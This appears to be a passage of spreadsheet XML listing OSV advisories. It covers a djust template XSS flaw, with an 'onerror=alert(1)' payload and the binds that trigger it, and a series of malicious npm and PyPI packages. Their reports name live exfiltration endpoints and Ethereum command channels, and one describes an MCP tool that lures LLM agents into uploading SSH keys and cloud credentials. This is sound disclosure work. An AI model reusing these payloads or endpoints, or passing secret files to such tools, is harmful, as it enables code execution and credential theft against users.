        <is>
          <t>1.1.2</t>
        </is>
      </c>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>A context safety grant was inherited by a template **binding** that never earned it, so rebinding a name the view had marked safe left the mark attached to the new, attacker-controlled value.
djust's context safety channel is keyed by **name**, not by value. Every bind copied the value and left the grant in place:
```
view marks   p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')
template     {% with p=user_input %}{{ p }}{% endwith %}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
## Affected binds
Eight distinct shapes were live. All are fixed in 1.1.2:
| shape | example |
|---|---|
| `{% with %}` rebinding a marked name | `{% with p=hostile %}{{ p }}{% endwith %}` |
| `{% with %}` **descendant** of a rebound name | `{% with p=hostile %}{{ p.a }}{% endwith %}` |
| `{% with %}` binding over a marked name | `{% with q=hostile %}{{ q }}{% endwith %}` |
| `{% for %}` loop variable | `{% for p in hostiles %}{{ p }}{% endfor %}` |
| `{% for %}` descendant | `{% for p in hostiles %}{{ p.a }}{% endfor %}` |
| `{% for %}` tuple unpacking | `{% for k, v in rows %}{{ v }}{% endfor %}` |
| `{% include … with %}` | `{% include "c.html" with q=hostile %}` |
| assign tags | `{% … as x %}` |
No filter chain and no `|safe` anywhere in the template is required. The precondition is that the application marked *some* value safe under a name that a template later rebinds — an ordinary pattern, since a view commonly marks trusted markup safe and templates commonly reuse short names such as `p`, `item` or `row`.
## Impact
Stored or reflected XSS in any djust application that combines `mark_safe` (or any framework path that grants a context key safety) with a template that rebinds that name. Exploitation requires no unusual template construct.
## Patches
Fixed in **1.1.2**, and in 1.2.0 (`main`).
The rule is that a bind **replaces** the grant rather than inheriting one. It is stated that way deliberately: the originally reported defects pointed the *opposite* direction — a grant being **lost** across some binds, causing over-escaping — and fixing only the reported direction would have left this leak in place. Both directions are the same rule.
**Not fixed in 1.1.2**, and tracked for 1.2.0: two over-escaping cases where a grant fails to travel with a value that legitimately carries one (`{% with body=post.text|linebreaks %}`, and `mark_safe` reaching a template through `dict.values` / `dict.items`). Both escape *more* than Django rather than less, so neither is a leak.
## Workarounds
Before upgrading, avoid reusing a context name for both `mark_safe`'d content and untrusted input, and avoid rebinding such a name in `{% with %}`, `{% for %}`, `{% include … with %}` or an assign tag.
## Credit
Found while preparing the 1.1.1 security release: the reproducer published in GHSA-9395-2g46-rj3f was run against the built 1.1.1 artifact before that advisory was published, and proved the class was still live. Publishing the original text would have reported this class as patched when it was not.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16250</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="inlineStr"/>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>PyPI:marketing-mcp</t>
        </is>
      </c>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (87216e00fe68e2de8b140f1f9ffc2db5a8e814f38030e2eb6120c9ae9e7ca3ff)
The package exposes an MCP tool `send(path)` that reads a caller-specified local file and POSTs its contents to a hardcoded `https://webhook.site/4acf7132-a75e-47e1-aeff-0350c8eac16c` endpoint. The destination is a fixed public request-capture service, is not caller-configurable, and is not the installer's infrastructure. Any file path an LLM agent is induced to pass to `send` — including sensitive paths such as `~/.ssh/id_rsa`, `~/.aws/credentials`, `.env` files, or source trees — is uploaded to that third-party capture URL where the operator of the webhook can retrieve it. The package's advertised marketing/MCP framing does not match the actual behavior, which is a one-way file relay to an author-controlled inspection endpoint.
## Source: kam193 (6a271b29f840e2047c34363e985921e1a374194cfcae7524698f178c96bea9eb)
Package attempts to lure LLM agents to exfiltrate files to a hardcoded location. Analysis of infrastructure suggests preparing for exfiltrating credentials.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-marketing-mcp
Reasons (based on the campaign):
 - files-exfiltration
 - llm-threat
</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16250</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16251</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="inlineStr"/>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-contact-form</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr"/>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0b198bc6d5af472f9cb1f1db25acf0215b77c04a742fcce81fef5565d76d837b)
Package presents itself as the Tailwind CSS forms plugin (README is a verbatim copy of @tailwindcss/forms and its package.json points at github.com/tailwindlabs/tailwindcss-forms), and the README instructs users to require('tailwindcss-contact-form') from their tailwind.config.js. The single main file src/index.js is heavily obfuscated (obfuscator.io-style rotated string array, hex identifiers, control-flow flattening) and, when required, imports node:http/node:https and spawn from node:child_process, queries public Ethereum RPCs (eth.drpc.org, ethereum-rpc.publicnode.com, 1rpc.io/eth, public.blastapi.io) and the Blockscout txlist API for outbound transactions of the hardcoded address 0xa322E5f3D311D3080e6f0121063e9aDC2490Ef1a, extracts a base64 payload from transaction data (x-payload-B64), and executes it by spawning node. This is a remote-code-execution loader using the Ethereum blockchain as a command-and-control channel: whoever controls the hardcoded key controls code execution on every machine that imports the package. The Tailwind-forms cover story, verbatim README, and forged repository link exist to trick developers into wiring the require() into their build config.
</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16251</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16252</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="inlineStr"/>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>npm:ragacateslikodi</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr"/>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (09a5a8774b4ce673a050b7e26c7d08aec66320fc14257196157363935ac19aa1)
On require/import of the package's main entry, a top-level async IIFE probes http://localhost:5000 for a hardcoded set of paths (/admin, /flag, /profile variants), concatenates status, length, and any body content matching flag patterns from those responses, and POSTs the aggregated result to a hardcoded webhook.site endpoint (https://webhook.site/1895d1d5-b227-4ce4-a2ce-232b1bec8b65). Package metadata is empty (no description, author, or repository), and the package ships no legitimate functionality alongside this behavior. Installing and importing this package causes any locally accessible service on port 5000 — including internal admin interfaces or CTF-style flag endpoints — to be scraped and its responses sent to an attacker-controlled collector.
</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16252</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16254</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>npm:pulse-pwn-9f3a2</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr"/>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8086e23ce4b6ff1ca043ca8d9c83f384455e0baee3d06cd79e8a0d5d52c04e1)
index.js contains top-level code that fetches /profile and sends document.cookie together with the response body to a hardcoded webhook.site URL (https://webhook.site/42c6d937-77c7-42a5-8678-ef06b4501e38) via a GET request with the cookie and profile content passed as URL-encoded query parameters. Any consumer that requires or imports this package in a browser-like context leaks the caller's session cookies and /profile response to an attacker-controlled collector. The destination is a third-party request-inspection service unrelated to any documented purpose of the package, and the exfiltration path fires on module load rather than through an explicit API call.
</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16254</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16260</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>npm:confx1789550882</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr"/>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72ce9bca41cb0378952b582d6f115a3bffd2acea4999a90bae5f916428921b64)
The package's main file index.js is an IIFE that, when loaded in a browser same-origin context (e.g. via unpkg), reads location.href and document.cookie, fetches authenticated endpoints such as /profile, /admin, /dev, /flag, and /me with credentials:'include', and POSTs the responses along with a matched flag pattern to the hardcoded webhook https://webhook.site/04d98207-c947-4938-9f0c-f92feae051cb/. package.json contains only a 'ctf' description with no author or repository, and the single shipped artifact is this exfiltration payload. Comments in the file describe it as an unpkg-hosted exfil payload.
</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16260</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16261</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="inlineStr"/>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>npm:@railone/image-utils</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr"/>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ebec05d8415347cef93849315a26f4221e34efa278fffe1b89700af039246dc6)
On import, index.js calls initialize() which spawns a detached, stdio-suppressed, windowsHide `node loader.js` child (init.js) and records its PID. loader.js HTTPS-fetches JSON from https://api.npoint.io/641d37178a880b1e8b8f, base64-decodes the `code` field, and executes it via `new Function('require','__dirname','__filename','module','exports', decodedCode)(...)`, running arbitrary attacker-controlled JavaScript on the installer's host with full Node privileges and network access. The npoint.io endpoint is a mutable third-party JSON store whose contents can be changed at any time by whoever controls that resource, giving that party a persistent remote code-push channel into every installer. The package advertises itself as an image/runtime utility exposing `getProcessInfo`/`getRuntimeInfo`, but no such functions are exported; internal comments identify the code as an 'ID-10 Client Module' for 'device information collection and remote code execution' with 'AUTO-START ON IMPORT'.
</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16261</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16262</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="inlineStr"/>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-ui</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr"/>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c7a21e4623006a0c69e3dfeb80857eadd9102550c8a77c1d95e880245a5f0fa9)
Package name and repository field impersonate the legitimate tailwindlabs/tailwindcss-forms plugin, but the shipped main entry src/index.js is a fully obfuscated (obfuscator.io string-array) module that has nothing to do with Tailwind CSS. On module load it imports node:child_process (spawn), node:http/https, node:zlib and node:url, builds a list of Ethereum JSON-RPC endpoints (process.env.ETH_RPC_URL, *.publicnode.com, drpc.org, 1rpc.io/eth, blockscout) and an Etherscan-style txlist URL for the hardcoded sender address 0xa322E5f39aDC2490EfD311D3080e6f0121063e1a, and polls eth_blockNumber / eth_getBlockByNumber / eth_getTransactionCount to retrieve attacker-published transactions. The retrieved payloads are decompressed via gunzip/inflate/brotli and passed to child_process.spawn, giving whoever controls that Ethereum address arbitrary command execution on any host that requires or imports the package. The on-chain command channel is takedown-resistant. The Tailwind-forms identity, the obfuscated main, and the require-time RCE together form a cover-story typosquat delivering installer-side remote code execution.
</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16262</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16263</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="inlineStr"/>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-form-utils</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr"/>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1eab685b70dc7394ba9eade13925f6da52267f61edcf8ba204bcf9ac3bd4c7bc)
The package publishes under the name tailwindcss-form-utils while pointing its repository field at https://github.com/tailwindlabs/tailwindcss-forms and mirroring that project's README verbatim, positioning itself as a lookalike of the first-party Tailwind Labs forms plugin. Its main entrypoint src/index.js is heavily obfuscated (obfuscator.io string-array with rotation, hex identifier renaming, 303 encoded string entries) and, once decoded, imports node:http, node:https, node:zlib, node:url and node:child_process spawn. It hard-codes an Ethereum sender address 0xa322E5f3D311D3080e9aDC2490Ef6f0121063e1a and queries Ethereum RPC endpoints (1rpc.io/eth, *.publicnode.com, eth.drpc.org) plus a blockscout/etherscan-style txlist indexer to retrieve transaction payloads authored by that address, reconstructs JavaScript source from the returned data, and injects it into the global scope (global.r=require, global.m=module) before executing it via child_process spawn. The blockchain acts as a mutable, attacker-writable command channel: whichever payload the attacker's address most recently published in a transaction becomes code executed on every require of the package. A Tailwind CSS plugin has no legitimate need for child_process, HTTP fetches to Ethereum RPCs, or dynamic global code assembly.
</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16263</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16264</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>PyPI:aiosendletter</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr"/>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (29baa6f2cbfb2ef9907be7830505e33e82b5a1e6a45eb7f995022d09f5841f09)
The package advertises itself as a 'safe bug reporter' but its init() function archives the contents of %LOCALAPPDATA%\logs with shutil.make_archive and POSTs the resulting archive to a hardcoded, non-configurable Cloudflare Workers endpoint at https://sparkling-pine-f202.stilluer-sweden.workers.dev/. The destination is author-controlled, the caller has no way to redirect or disable it, and code comments indicate the target directory is expected to include a Telegram bot token folder — the collected data is credential-adjacent local state leaving the installer's machine. On Windows the same function calls ctypes.windll.shell32.ShellExecuteW with the 'runas' verb to relaunch the interpreter under UAC elevation before performing the archive-and-upload, broadening the set of files reachable for collection. Separately, pyproject.toml declares 'ctypes' as a runtime dependency; ctypes is a Python standard-library module, so pip resolves this name against PyPI and installs whatever package is published there under 'ctypes', executing that third party's code at install time. The cover-story description, the hardcoded off-host destination for locally-collected data, the privilege escalation, and the stdlib-name dependency-confusion vector jointly constitute an active supply-chain attack on installers.
## Source: kam193 (4e81e3b63bbe719f6d0bdd42930bb2f3235b8e41cbacf449743bb7dca67c9f08)
Package hides code to exfiltrate files. Most releases target unclear files, but some reveal the goal to exfiltrate sensitive Telegram data.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-aiosendletter
Reasons (based on the campaign):
 - files-exfiltration
 - target:telegram
</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16264</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16267</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="inlineStr"/>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjstat-smooth</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr"/>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f65efaaf25b41d789624595550d966762b21747205b23f15325db2e05924387d)
The package (advertised as a JSON-stat library) ships a test module that, when the test suite is executed, walks the /app and /Users directory trees, targets files ending in 'flags.json' (with an expected path '/app/injection_range/corpus/treasure/flags.json'), and uploads matched file contents to https://api.anthropic.com/v1/files. Authentication uses a hardcoded Anthropic API key ('sk-ant-api03-...') that is reassembled at runtime from split base64 fragments (baseA/baseB/baseC/baseD concatenated and base64-decoded inside _assembled_test_key()); the installer's own ANTHROPIC_API_KEY environment variable is explicitly ignored, so uploads occur under the author's Anthropic account regardless of the installer's configuration. setup.py declares test_suite='pyjstat.test' and the file uses a pytest-discoverable test_*.py name, so any installer running the shipped test suite triggers filesystem enumeration and upload of arbitrary local file contents to a third-party endpoint under the author's control. The runtime reassembly of the credential from split base64 fragments is a deliberate evasion of secret scanners and, together with the flag-hunting file walk, is inconsistent with legitimate library testing.
## Source: kam193 (82a12638b869aecb566588c24c0f59c3137f9b89a26ae67222370249a7176a75)
The package hides code to exfiltrate specific files from the user's machine. The used file paths suggest it was intended to be used in a CTF-like environment.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pyjstat-smooth
Reasons (based on the campaign):
 - files-exfiltration
 - obfuscation
 - targetted-attack
 - clones-real-package
</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16267</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16268</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>PyPI:index-forum</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr"/>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (7561fd94425cdde34f5f9f3d20482a0da8680414d0f38e1e00fea419ce23cf66)
The package hides code to exfiltrate specific files from the user's machine. The used file paths suggest it was intended to be used in a CTF-like environment.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-pyjstat-smooth
Reasons (based on the campaign):
 - files-exfiltration
 - obfuscation
 - targetted-attack
 - clones-real-package
</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16268</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16269</t>
        </is>
      </c>
